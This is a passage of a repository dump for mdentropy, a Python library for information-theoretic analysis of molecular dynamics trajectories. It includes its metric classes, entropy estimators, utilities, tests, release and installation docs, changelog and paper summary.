eq(M - M.T, 0)\n _test_mi_shuffle(mi, traj)\n\n\ndef _test_mi_shuffle(mi, traj):\n M = mi.partial_transform(traj, shuffle=0)\n MS = mi.partial_transform(traj, shuffle=1)\n\n error = np.abs(M - MS).ravel()\n\n assert any(error > 1E-6)\n" }, { "alpha_fraction": 0.5727980732917786, "alphanum_fraction": 0.5755941867828369, "avg_line_length": 30.293750762939453, "blob_id": "0b311f2149ebe440b0677492e99f383d58fad5f2", "content_id": "fd963833b70c7f0015e0249138d585eefb83829f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5007, "license_type": "permissive", "max_line_length": 79, "num_lines": 160, "path": "/mdentropy/metrics/base.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..utils import floor_threshold, Timing\nfrom ..utils import shuffle as shuffle_data\n\nfrom multiprocessing import cpu_count\n\nimport pandas as pd\nimport numpy as np\n\nfrom msmbuilder.featurizer import (AlphaAngleFeaturizer, ContactFeaturizer,\n DihedralFeaturizer)\n\n\nclass BaseMetric(object):\n\n \"\"\"Base metric object\"\"\"\n\n def _shuffle(self):\n self.shuffled_data = shuffle_data(self.shuffled_data)\n\n def _extract_data(self, traj):\n pass\n\n def _before_exec(self, traj):\n self.data = self._extract_data(traj)\n self.shuffled_data = self.data\n self.labels = np.unique(self.data.columns.levels[0])\n\n def _exec(self):\n pass\n\n def _floored_exec(self):\n return floor_threshold(self._exec())\n\n def partial_transform(self, traj, shuffle=0, verbose=False):\n \"\"\"Transform a single mdtraj.Trajectory into an array of metric scores.\n\n Parameters\n ----------\n traj : mdtraj.Trajectory\n Trajectory to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray\n Scoring matrix\n \"\"\"\n self._before_exec(traj)\n result = self._floored_exec()\n correction = np.zeros_like(result)\n for i in range(shuffle):\n with Timing(i, verbose=verbose):\n self._shuffle()\n correction += self._floored_exec()\n\n return floor_threshold(result - np.nan_to_num(correction / shuffle))\n\n def transform(self, trajs, shuffle=0, verbose=False):\n \"\"\"Invokes partial_transform over a list of mdtraj.Trajectory objects\n\n Parameters\n ----------\n trajs : list\n List of trajectories to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : array_like\n List of scoring matrices\n \"\"\"\n for traj in trajs:\n yield self.partial_transform(traj, shuffle=shuffle,\n verbose=verbose)\n\n def __init__(self, n_bins=3, rng=None, method='knn',\n threads=None):\n self.data = None\n self.shuffled_data = None\n self.labels = None\n self.n_bins = n_bins\n self.rng = rng\n self.method = method\n self.n_threads = threads or int(cpu_count() / 2)\n\n\nclass DihedralBaseMetric(BaseMetric):\n\n \"\"\"Base dihedral metric object\"\"\"\n\n def _featurizer(self, **kwargs):\n return DihedralFeaturizer(sincos=False, **kwargs)\n\n def _extract_data(self, traj):\n data = []\n for tp in self.types:\n featurizer = self._featurizer(types=[tp])\n angles = featurizer.partial_transform(traj)\n summary = featurizer.describe_features(traj)\n idx = [[traj.topology.atom(ati).residue.index\n for ati in item['atominds']][1] for item in summary]\n data.append(pd.DataFrame((angles + np.pi) % (2. * np.pi),\n columns=[idx, len(idx) * [tp]]))\n return pd.concat(data, axis=1)\n\n def __init__(self, types=None, rng=None, **kwargs):\n self.types = types or ['phi', 'psi']\n self.rng = rng or [0., 2 * np.pi]\n\n super(DihedralBaseMetric, self).__init__(**kwargs)\n\n\nclass AlphaAngleBaseMetric(DihedralBaseMetric):\n\n \"\"\"Base alpha angle metric object\"\"\"\n\n def _featurizer(self, **kwargs):\n return AlphaAngleFeaturizer(sincos=False)\n\n def __init__(self, **kwargs):\n self.types = ['alpha']\n\n super(AlphaAngleBaseMetric, self).__init__(**kwargs)\n\n\nclass ContactBaseMetric(BaseMetric):\n\n \"\"\"Base contact metric object\"\"\"\n\n def _extract_data(self, traj):\n contact = ContactFeaturizer(contacts=self.contacts, scheme=self.scheme,\n ignore_nonprotein=self.ignore_nonprotein)\n distances = contact.partial_transform(traj)\n summary = contact.describe_features(traj)\n pairs = [item['resids'] for item in summary]\n resids = np.unique(pairs)\n data = []\n for resid in resids:\n idx = list(list(set(pair) - {resid})[0]\n for pair in pairs if resid in pair)\n mapping = np.array([True if resid in pair else False\n for pair in pairs])\n data.append(pd.DataFrame(distances[:, mapping],\n columns=[idx, len(idx) * [resid]]))\n\n return pd.concat(data, axis=1)\n\n def __init__(self, contacts='all', scheme='closest-heavy',\n ignore_nonprotein=True, **kwargs):\n self.contacts = contacts\n self.scheme = scheme\n self.ignore_nonprotein = ignore_nonprotein\n\n super(ContactBaseMetric, self).__init__(**kwargs)\n" }, { "alpha_fraction": 0.6120981574058533, "alphanum_fraction": 0.6129441857337952, "avg_line_length": 29.701297760009766, "blob_id": "8c79464ccd45fc8e79ab829d11c7a5dad0794cda", "content_id": "855e581476921ae57d4de787a871b5c54e8f3477", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2364, "license_type": "permissive", "max_line_length": 79, "num_lines": 77, "path": "/mdentropy/metrics/mutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from ..core import mutinf, nmutinf\nfrom .base import (AlphaAngleBaseMetric, ContactBaseMetric, DihedralBaseMetric,\n BaseMetric)\n\nimport numpy as np\nfrom itertools import combinations_with_replacement as combinations\n\nfrom multiprocessing import Pool\nfrom contextlib import closing\n\n__all__ = ['AlphaAngleMutualInformation', 'ContactMutualInformation',\n 'DihedralMutualInformation']\n\n\nclass MutualInformationBase(BaseMetric):\n\n \"\"\"Base mutual information object\"\"\"\n\n def _partial_mutinf(self, p):\n i, j = p\n\n return self._est(self.n_bins,\n self.data[i].values,\n self.shuffled_data[j].values,\n rng=self.rng,\n method=self.method)\n\n def _exec(self):\n M = np.zeros((self.labels.size, self.labels.size))\n\n with closing(Pool(processes=self.n_threads)) as pool:\n values = pool.map(self._partial_mutinf,\n combinations(self.labels, 2))\n pool.terminate()\n\n idx = np.triu_indices_from(M)\n M[idx] = values\n\n return M + M.T - np.diag(M.diagonal())\n\n def __init__(self, normed=True, **kwargs):\n self._est = nmutinf if normed else mutinf\n self.partial_transform.__func__.__doc__ = \"\"\"\n Partial transform a mdtraj.Trajectory into an n_residue by n_residue\n matrix of mutual information scores.\n\n Parameters\n ----------\n traj : mdtraj.Trajectory\n Trajectory to transform\n shuffle : int\n Number of shuffle iterations (default: 0)\n verbose : bool\n Whether to display performance\n\n Returns\n -------\n result : np.ndarray, shape = (n_residue, n_residue)\n Mutual information matrix\n \"\"\"\n\n super(MutualInformationBase, self).__init__(**kwargs)\n\n\nclass AlphaAngleMutualInformation(AlphaAngleBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for alpha angles\"\"\"\n\n\nclass ContactMutualInformation(ContactBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for contacts\"\"\"\n\n\nclass DihedralMutualInformation(DihedralBaseMetric, MutualInformationBase):\n\n \"\"\"Mutual information calculations for dihedral angles\"\"\"\n" }, { "alpha_fraction": 0.7374892234802246, "alphanum_fraction": 0.7441760301589966, "avg_line_length": 42.32710266113281, "blob_id": "9a621c2041b062a72123043d43e493ff90f52553", "content_id": "cdadecd72cd7f9de4f6dd410d93087db7fb41d68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4636, "license_type": "permissive", "max_line_length": 103, "num_lines": 107, "path": "/devtools/README.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "How to release\n===================\n\nPre-release + Github\n--------------------\n- Update the `docs/whatsnew.rst` document. Use the github view that shows all the\n commits to master since the last release to write it\n * You can also try using [this tool](https://github.com/rmcgibbo/gh-util), which should list all\n of the PRs that have been merged since the laster release.\n- Update the version number in `devtools/conda-recipe/meta.yaml`\n- Commit to master, and tag the\n release on github.\n- Run git pull to pull the newly created tag locally. Versioneer depends on\n this to get the version string right.\n\nPyPI\n----\nThe next step is to add the release to the python package index.\n\n- Git pull, and make sure it pulls the recent tag.\n- Run `git clean -fdx` to clean the source directory.\n- Create the cannoncal \"sdist\" (source distribution) using `python setup.py sdist --formats=gztar,zip`.\n You ran git clean, right?\n- Inspect the sdist files (they're placed in `dist/`), and make sure they look right.\n You can try installing them into your environment with pip, unzipping or untaring them, etc.\n- Once you're satisfied that the sdist is correct, push the source to PyPI using\n `twine upload [path to sdist files]`. This requires being registered on PyPI as a owner or maintainer\n of the project.\n\nImmediately after creating the sdist\n------------------------------------\n- Update the version number in `devtools/conda-recipy/meta.yaml`\n to `1.(x+1).0.dev0` per PEP440.\n- Add a new section in `docs/whatsnew.rst` and mark it \"(Development)\".\n- Commit to master.\n\nConda\n-----\n- File a PR against [omnia-md/conda-recipes](https://github.com/omnia-md/conda-recipes) that\n updates the recipe's version string and source URL to pull the new sdist from PyPI. Travis\n and Appveyor will then build binary conda packages.\n\nWheels\n------\n\nPyPI hosts *wheels*, pre-compiled binary packages, like conda packages, for OS X and\nWindows. (At the time of this writing, they are still ironing out issues w.r.t.\nlinux.) To create and upload wheels, download the sdist and unpack the (or check out\nthe exact tag from git), and run `python setup.py bdist_wheel`.\n\nFor example, to build wheels for Python 2.7, 3.4 and 3.5 on OS X, I ran\n```\nconda env remove -y -n _build\nversions=(\"2.7\" \"3.4\" \"3.5\")\nfor v in \"${versions[@]}\"; do\n conda create -y -n _build python=$v numpy cython\n source activate _build\n python setup.py bdist_wheel\n source deactivate\n conda env remove -y -n _build\ndone\n```\nThen, if these all look good, you can upload them to PyPI with twine, as was done with the\nsdist.\n\n\nDocs Building & Hosting\n=======================\n\nAfter a travis build succeeds, the docs are built with sphinx and pushed to\nthe msmbuilder.org amazon s3 account in the mdentropy/ subdirectory.\nThe credentials for that account are stored,\nencrypted, in the .travis.yml file.\n\nMultiple versions of the docs are hosted\nonline. When a build happens on a version with ISRELEASED==False, it's put into\nthe \"development\" folder on the S3 bucket. If ISRELEASED==True, it's put into a\nsubfolder with the name of the short release. The relevant logic is in\n`devtools/travis-ci/set_doc_version.py`.\n\n\nTools License\n=============\nCopyright (c) 2012-2016 Stanford University and the Authors\nAll rights reserved.\n\nRedistribution and use of all files in this folder (devtools) and (../.travis.yml,\n../basesetup.py, ../setup.py) files in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n" }, { "alpha_fraction": 0.6681581139564514, "alphanum_fraction": 0.6830723285675049, "avg_line_length": 20.285715103149414, "blob_id": "d7324338baee6dff8a4bc7c6939663b85e7952e5", "content_id": "03c4cfc3d6539dd06cb75680b380effeda867e28", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1341, "license_type": "permissive", "max_line_length": 73, "num_lines": 63, "path": "/docs/installation.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "Installation\n============\n\nMDEntropy is written in Python, and can be installed with standard Python\nmachinery; although, we highly recommend using an\n`Anaconda Python distribution <https://www.continuum.io/downloads>`_.\n\n\nRelease Version\n---------------\n\n\nWith Anaconda, installation is as easy as:\n\n.. code-block:: bash\n\n $ conda install -c omnia mdentropy\n\nYou can also install mdentropy with `pip`:\n\n.. code-block:: bash\n\n $ pip install mdentropy\n\nAlternatively, you can install directly our\n`GitHub repository <https://github.com/msmbuilder/mdentropy>`_.:\n\n.. code-block:: bash\n\n $ git clone https://github.com/msmbuilder/mdentropy.git\n $ cd mdentropy && git checkout v0.3.0\n $ python setup.py install\n\n\nDevelopment Version\n-------------------\n\nTo grab the latest version from github, run:\n\n.. code-block:: bash\n\n $ pip install git+git://github.com/pandegroup/mdentropy.git\n\nOr clone the repo yourself and run `setup.py`:\n\n.. code-block:: bash\n\n $ git clone https://github.com/pandegroup/mdentropy.git\n $ cd mdentropy && python setup.py install\n\n\nDependencies\n------------\n- ``python>=3.4``\n- ``numpy>=1.10.4``\n- ``scipy>=0.17.0``\n- ``scikit-learn>=0.17.0``\n- ``msmbuilder>=3.5.0``\n- ``nose`` (optional, for testing)\n\nYou can grab most of them with conda. ::\n\n $ conda install -c omnia scipy numpy scikit-learn msmbuilder nose\n" }, { "alpha_fraction": 0.7219451665878296, "alphanum_fraction": 0.7256857752799988, "avg_line_length": 23.303030014038086, "blob_id": "a67bcec53968aa5b8aed6071f83d1ca06a450ce7", "content_id": "d1378f7f6ec94aad456f3f5f8ce7e403d3de24bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 802, "license_type": "permissive", "max_line_length": 139, "num_lines": 33, "path": "/docs/examples/index.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. _examples:\n\nExamples\n========\n\nThe following examples show off various aspects or capabilities of\nMDEntropy. They can be run interactively in Jupyter (IPython) notebook.\nDownload the `notebook files\n<https://github.com/msmbuilder/mdentropy/tree/master/examples>`_ and open\nthem in Jupyter::\n\n $ jupyter notebook\n\n.. To make the ipython rendered images show up, each rst file must be\n in its own directory.\n\n.. toctree::\n :maxdepth: 2\n :titlesonly:\n\n mutual-information\n\n\nPlease note that additional requirement for these notebooks inclue the latest versions of ``matplotlib``, ``nglview``, and ``msmexplorer``.\n\n\nContributing examples\n---------------------\n\nDo you have a neat example of using MDEntropy? Format your code\ninto an IPython notebook and submit a pull request!\n\n.. vim: tw=75\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "1d673afda56e844fa12095c1d96f41d533a9d78c", "content_id": "cac3680cdab9bf4f64bd5053b80e42ce8464ae65", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "permissive", "max_line_length": 21, "num_lines": 2, "path": "/mdentropy/metrics/__init__.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .mutinf import *\nfrom .tent import *\n" }, { "alpha_fraction": 0.7484884858131409, "alphanum_fraction": 0.7708585262298584, "avg_line_length": 34.956520080566406, "blob_id": "7f04535507995634093a48d323a2b52ff1c5b49f", "content_id": "917f6cdde2fe0a08ba2869e0a889279361d4bfe9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1654, "license_type": "permissive", "max_line_length": 79, "num_lines": 46, "path": "/paper/paper.md", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "---\ntitle: 'MDEntropy: Information-Theoretic Analyses for Molecular Dynamics'\ntags:\n - Python\n - information theory\n - molecular dynamics\n - time-series\nauthors:\n - name: Carlos X. Hernández\n orcid: 0000-0002-8146-5904\n affiliation: 1\n - name: Vijay S. Pande\n affiliation: 1\naffiliations:\n - name: Stanford University\n index: 1\ndate: 1 October 2017\nbibliography: paper.bib\nrepository: https://github.com/msmbuilder/mdentropy\narchive_doi: https://doi.org/10.5281/zenodo.1000997\n---\n\n\n# Summary\n\n*MDEntropy* is a Python package for information-theoretic (IT) analysis of data\ngenerated from molecular dynamics simulations. While correlation studies\nhave long been of interest to the molecular dynamics (MD) community\n[@mccammon, @mcclendon], IT tools to analyze MD trajectories have been much\nless developed. *MDEntropy* seeks to fill this niche by providing an\neasy-to-use Python API that works seamlessly with other Python packages, such\nas ``mdtraj``, ``msmbuilder``, and ``numpy`` [@mdtraj, @numpy, @msmbuilder].\n\nFunctionality in *MDEntropy* is centered around ``mdtraj`` trajectories and the\nstatistical tools available in ``msmbuilder``. Leveraging these tools allows\nfor statistically robust analyses of many IT estimators across a variety of\nbiomolecular feature-spaces [@schreiber, @grassberger].\n\n*MDEntropy* is actively developed and maintained by researchers at Stanford\nUniversity. Source code for *MDEntropy* is hosted on GitHub and is\ncontinuously archived to Zenodo [@mdent_archive]. Full documentation, including\nJupyter Notebook tutorials, can be found at\n[http://msmbuilder.org/mdentropy](http://msmbuilder.org/mdentropy).\n\n\n# References\n" }, { "alpha_fraction": 0.6778350472450256, "alphanum_fraction": 0.6778350472450256, "avg_line_length": 19.421052932739258, "blob_id": "72a87278b0f5360745f8674cd7cfa8f3c4d107c9", "content_id": "a51430a9b2f76bfe2653a040f439af42b8f593ca", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "permissive", "max_line_length": 51, "num_lines": 19, "path": "/mdentropy/tests/test_cli.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "import subprocess\nfrom distutils.spawn import find_executable\n\nMDENT = find_executable('mdent')\n\n\ndef test_mdent():\n assert MDENT is not None\n subprocess.check_call([MDENT, '-h'])\n\n\ndef test_dmutinf():\n assert MDENT is not None\n subprocess.check_call([MDENT, 'dmutinf', '-h'])\n\n\ndef test_dtent():\n assert MDENT is not None\n subprocess.check_call([MDENT, 'dtent', '-h'])\n" }, { "alpha_fraction": 0.5955983400344849, "alphanum_fraction": 0.6396148800849915, "avg_line_length": 21.030303955078125, "blob_id": "31ab6129eaa8fd500d5db200ca35675c5e0aec75", "content_id": "26dcf201799718262d9e874ac97e10adb26b49c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 727, "license_type": "permissive", "max_line_length": 52, "num_lines": 33, "path": "/docs/changelog.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": ".. _changelog:\n\nChangelog\n=========\n\nv0.4 (Development)\n------------------\n\nv0.3\n----\n\nAPI Changes\n~~~~~~~~~~~\n- Added ``method`` option (gh-18).\n- Added contact and alpha angle ``metrics`` (gh-33).\n\nNew Features\n~~~~~~~~~~~~\n- Added KDE entropy estimation (gh-16).\n- Added adaptive partitioning (gh-20).\n- Added symbolic entropy (gh-30).\n- Added KNN entropy estimators (gh-40).\n- Change default to Grassberger (gh-45).\n\nImprovements\n~~~~~~~~~~~~\n- Massive reorganization and unit tests (gh-19).\n- Added tests for shuffling correction (gh-24).\n- Added dihedral option to scripts (gh-29).\n- Added more options to scripts (gh-31).\n- Improved code health (gh-41).\n- Added conda-build and CLI (gh-46).\n- KNN code speed up (gh-49).\n" }, { "alpha_fraction": 0.5270894765853882, "alphanum_fraction": 0.5459890961647034, "avg_line_length": 25.903955459594727, "blob_id": "83006fdb310a824e77817c335d3aea7c46be26fd", "content_id": "c4fededd1efa154ddcf11969fe6a1ad856bc73cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4762, "license_type": "permissive", "max_line_length": 75, "num_lines": 177, "path": "/mdentropy/core/entropy.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from .binning import symbolic\nfrom ..utils import kde, nearest_distances\n\nfrom itertools import chain\n\nfrom numpy import ndarray\nfrom numpy import sum as npsum\nfrom numpy import (atleast_2d, arange, bincount, diff, finfo, float32,\n hsplit, log, nan_to_num, nansum, product, ravel, vstack)\n\nfrom scipy.stats import entropy as naive\nfrom scipy.special import psi\n\n__all__ = ['entropy', 'centropy']\nEPS = finfo(float32).eps\n\n\ndef entropy(n_bins, rng, method, *args):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n rng : list of lists\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', 'knn', None}\n Method used to calculate entropy.\n args : numpy.ndarray, shape = (n_samples, ) or (n_samples, n_dims)\n Data of which to calculate entropy. Each array must have the same\n number of samples.\n\n Returns\n -------\n entropy : float\n \"\"\"\n args = [args] if isinstance(args, ndarray) else args\n args = list(chain(*[map(ravel, hsplit(arg, arg.shape[1]))\n if arg.ndim == 2\n else atleast_2d(arg)\n for arg in args]))\n\n if method == 'knn':\n return knn_entropy(*args, k=n_bins)\n\n if rng is None or None in rng:\n rng = len(args) * [None]\n\n for i, arg in enumerate(args):\n if rng[i] is None:\n rng[i] = (min(arg), max(arg))\n\n if method == 'kde':\n return kde_entropy(rng, *args, grid_size=n_bins or 20)\n\n counts = symbolic(n_bins, rng, *args)\n\n if method == 'chaowangjost':\n return chaowangjost(counts)\n elif method == 'grassberger':\n return grassberger(counts)\n\n return naive(counts)\n\n\ndef centropy(n_bins, x, y, rng=None, method='knn'):\n \"\"\"Conditional entropy calculation\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n x : array_like, shape = (n_samples, n_dims)\n Conditioned variable.\n y : array_like, shape = (n_samples, n_dims)\n Conditional variable.\n rng : list\n List of min/max values to bin data over.\n method : {'kde', 'chaowangjost', 'grassberger', None}\n Method used to calculate entropy.\n\n Returns\n -------\n entropy : float\n \"\"\"\n return (entropy(n_bins, 2 * [rng], method, x, y) -\n entropy(n_bins, [rng], method, y))\n\n\ndef knn_entropy(*args, k=None):\n \"\"\"Entropy calculation\n\n Parameters\n ----------\n args : numpy.ndarray, shape = (n_samples, ) or (n_samples, n_dims)\n Data of which to calculate entropy. Each array must have the same\n number of samples.\n k : int\n Number of bins.\n\n Returns\n -------\n entropy : float\n \"\"\"\n data = vstack((args)).T\n n_samples, n_dims = data.shape\n k = k if k else max(3, int(n_samples * 0.01))\n\n nneighbor = nearest_distances(data, k=k)\n const = psi(n_samples) - psi(k) + n_dims * log(2.)\n\n return (const + n_dims * log(nneighbor).mean())\n\n\ndef kde_entropy(rng, *args, grid_size=20, **kwargs):\n \"\"\"Kernel Density Estimation of Entropy\"\"\"\n data = vstack((args)).T\n\n prob, space = kde(data, rng, grid_size=20, **kwargs)\n\n return -nansum(prob * log(prob)) * product(diff(space)[:, 0])\n\n\ndef grassberger(counts):\n \"\"\"Entropy calculation using Grassberger correction.\n doi:10.1016/0375-9601(88)90193-4\n\n Parameters\n ----------\n counts : list\n bin counts\n\n Returns\n -------\n entropy : float\n \"\"\"\n n_samples = npsum(counts)\n return npsum(counts * (log(n_samples) -\n nan_to_num(psi(counts)) -\n ((-1.) ** counts / (counts + 1.)))) / n_samples\n\n\ndef chaowangjost(counts):\n \"\"\"Entropy calculation using Chao, Wang, Jost correction.\n doi: 10.1111/2041-210X.12108\n\n Parameters\n ----------\n counts : list\n bin counts\n\n Returns\n -------\n entropy : float\n \"\"\"\n n_samples = npsum(counts)\n bcbc = bincount(counts.astype(int))\n if len(bcbc) < 3:\n return grassberger(counts)\n if bcbc[2] == 0:\n if bcbc[1] == 0:\n A = 1.\n else:\n A = 2. / ((n_samples - 1.) * (bcbc[1] - 1.) + 2.)\n else:\n A = 2. * bcbc[2] / ((n_samples - 1.) * (bcbc[1] - 1.) +\n 2. * bcbc[2])\n pr = arange(1, int(n_samples))\n pr = 1. / pr * (1. - A) ** pr\n entropy = npsum(counts / n_samples * (psi(n_samples) -\n nan_to_num(psi(counts))))\n\n if bcbc[1] > 0 and A != 1.:\n entropy += nan_to_num(bcbc[1] / n_samples *\n (1 - A) ** (1 - n_samples *\n (-log(A) - npsum(pr))))\n return entropy\n" }, { "alpha_fraction": 0.5844943523406982, "alphanum_fraction": 0.5934831500053406, "avg_line_length": 25.969696044921875, "blob_id": "c181ded1f7b96d7ac1510a7a94e8ee92d418c5e5", "content_id": "237d47e1167889ca1743315f5f4840b8bfd92071", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4450, "license_type": "permissive", "max_line_length": 76, "num_lines": 165, "path": "/mdentropy/utils.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "from __future__ import print_function\n\nimport time\nfrom glob import glob\nfrom itertools import chain\n\nfrom numpy import (dtype, exp, finfo, float32, isscalar, linspace, log,\n meshgrid, nan_to_num, pi, random, ravel, unique, void,\n vstack)\nfrom numpy.linalg import det\n\nfrom sklearn.neighbors import KernelDensity, NearestNeighbors, BallTree\nfrom scipy.special import digamma, gamma\n\n\n__all__ = ['floor_threshold', 'parse_files', 'shuffle', 'Timing',\n 'unique_row_count', 'kde', 'nearest_distances', 'avgdigamma',\n 'volume_unit_ball']\nEPS = finfo(float32).eps\n\n\nclass Timing(object):\n \"Context manager for printing performance\"\n def __init__(self, iteration, verbose=False):\n self.iteration = iteration\n self.start = None\n self.verbose = verbose\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, ty, val, tb):\n end = time.time()\n if self.verbose:\n print(\"Round %d : %0.3f seconds\" %\n (self.iteration, end - self.start))\n return False\n\n\ndef parse_files(expr):\n expr = expr.replace(' ', '').split(',')\n return list(chain(*map(glob, expr)))\n\n\ndef shuffle(df, n=1):\n \"\"\"Convenience function for shuffling values in DataFrame objects\n\n Parameters\n ----------\n df : pandas.DataFrame\n pandas DataFrame\n n : int\n Number of shuffling iterations.\n Returns\n -------\n sdf : array_like, shape = (n_bins, )\n shuffled DataFrame\n \"\"\"\n sdf = df.copy()\n sampler = random.permutation\n for _ in range(n):\n sdf = sdf.apply(sampler, axis=0)\n sdf = sdf.apply(sampler, axis=1)\n return sdf\n\n\ndef unique_row_count(arr):\n \"\"\"Convenience function for counting unique rows in a numpy.ndarray\n\n Parameters\n ----------\n arr : numpy.ndarray\n Returns\n -------\n counts : array_like, shape = (n_bins, )\n unique row counts\n \"\"\"\n _, counts = unique(arr.view(dtype((void, arr.dtype.itemsize *\n arr.shape[1]))), return_counts=True)\n return counts\n\n\ndef floor_threshold(arr, threshold=0.):\n \"\"\"Convenience funtion for thresholding to a lower bound\n\n Parameters\n ----------\n arr : numpy.ndarray\n Returns\n -------\n new_arr : numpy.ndarray\n thresholded array\n \"\"\"\n new_arr = nan_to_num(arr.copy())\n new_arr[arr < threshold] = threshold\n return new_arr\n\n\ndef entropy_gaussian(C):\n '''\n Entropy of a gaussian variable with covariance matrix C\n '''\n if isscalar(C):\n return .5 * (1 + log(2 * pi)) + .5 * log(C)\n else:\n n = C.shape[0]\n return .5 * n * (1 + log(2 * pi)) + .5 * log(abs(det(C)))\n\n\ndef kde(data, rng, grid_size=10, **kwargs):\n \"\"\"Kernel Density Estimation with Scikit-learn\"\"\"\n n_samples = data.shape[0]\n n_dims = data.shape[1]\n\n bandwidth = (n_samples * (n_dims + 2) / 4.)**(-1. / (n_dims + 4.))\n kde_skl = KernelDensity(bandwidth=bandwidth, **kwargs)\n kde_skl.fit(data)\n\n space = [linspace(i[0], i[1], grid_size) for i in rng]\n grid = meshgrid(*tuple(space))\n\n # score_samples() returns the log-likelihood of the samples\n log_pdf = kde_skl.score_samples(vstack(map(ravel, grid)).T)\n return exp(log_pdf), space\n\n\ndef nearest_distances(X, k=1, leaf_size=16):\n '''\n X = array(N,M)\n N = number of points\n M = number of dimensions\n returns the distance to the kth nearest neighbor for every point in X\n '''\n # small amount of noise to break degeneracy.\n X += EPS * random.rand(*X.shape)\n\n knn = NearestNeighbors(n_neighbors=k + 1, leaf_size=leaf_size,\n p=float('inf'))\n knn.fit(X)\n d, _ = knn.kneighbors(X) # the first nearest neighbor is itself\n return d[:, -1]\n\n\ndef avgdigamma(data, dvec, leaf_size=16):\n \"\"\"Convenience function for finding expectation value of <psi(nx)> given\n some number of neighbors in some radius in a marginal space.\n\n Parameters\n ----------\n points : numpy.ndarray\n dvec : array_like (n_points,)\n Returns\n -------\n avgdigamma : float\n expectation value of <psi(nx)>\n \"\"\"\n tree = BallTree(data, leaf_size=leaf_size, p=float('inf'))\n\n n_points = tree.query_radius(data, dvec - EPS, count_only=True)\n\n return digamma(n_points).mean()\n\n\ndef volume_unit_ball(n_dims):\n return (pi ** (.5 * n_dims)) / gamma(.5 * n_dims + 1)\n" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.6808510422706604, "avg_line_length": 22.912281036376953, "blob_id": "eb1bd1c08f8b5ab62eff56b8b0c80100d12afcec", "content_id": "ed58e6f76f04bcb0dbc20d0d8272498094d28df1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1363, "license_type": "permissive", "max_line_length": 89, "num_lines": 57, "path": "/docs/index.rst", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "MDEntropy\n=========\n\nMDEntropy is a python library that allows users to perform information-theoretic\nanalyses on molecular dynamics (MD) trajectories. It includes methods to\ncalculate:\n\n- Bias-Corrected Entropy\n- Conditional Entropy\n- Mutual Information\n- Normalized Mutual Information\n- Conditional Mutual Information\n- Normalized Conditional Mutual Information\n\n\nMDEntropy is actively being 